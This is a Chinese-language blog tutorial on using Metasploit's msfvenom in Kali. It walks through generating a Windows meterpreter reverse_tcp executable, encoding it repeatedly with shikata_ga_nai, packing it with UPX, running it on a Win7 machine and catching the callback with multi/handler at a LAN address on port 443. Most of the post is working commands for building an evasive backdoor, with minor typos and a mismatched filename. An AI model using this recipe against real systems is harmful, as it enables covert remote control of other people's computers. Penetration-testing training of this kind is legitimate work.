msfvenom

18 篇文章 1 订阅
11 篇文章 0 订阅

摘要

在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。


msfvenom

:>>>

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.

  • 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
  • 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
  • 工具:MSF.

0x00

开启:postgresql

root@kali:~# service postgresql start

查看帮助

命令:

root# msfvenom -h

这里写图片描述

部分参数:>>>

-p 选择一个载荷[payload],或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
-f exe 生成EXE格式
LHOST,LPORT 监听上线的主机IP和端口

文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式

root@kali:~# msfvenom --help-formats
Error: Executable formats
    asp, aspx, aspx-exe, dll, elf, elf-so, 
exe, exe-only, exe-service, exe-small, hta-psh, 
loop-vbs, macho, msi, msi-nouac, osx-app, psh, 
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, 
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

过程

2、生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令:>>>

 root# msfvenom -p windows/meterpreter/reverse_tcp -o
3、现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: >>>

root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
4、upx加壳:>>>
upx -5 /root/Desktop/acn.exe
4、把生成的abc.exe放到win7下.执行.
5、在命令行下,打开msfconsole.

命令:>>>

root # msfconsole

6、本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: >>>

msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

生成一个程序的过程

[http://www.jianshu.com/p/8d3f94390eab]

  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值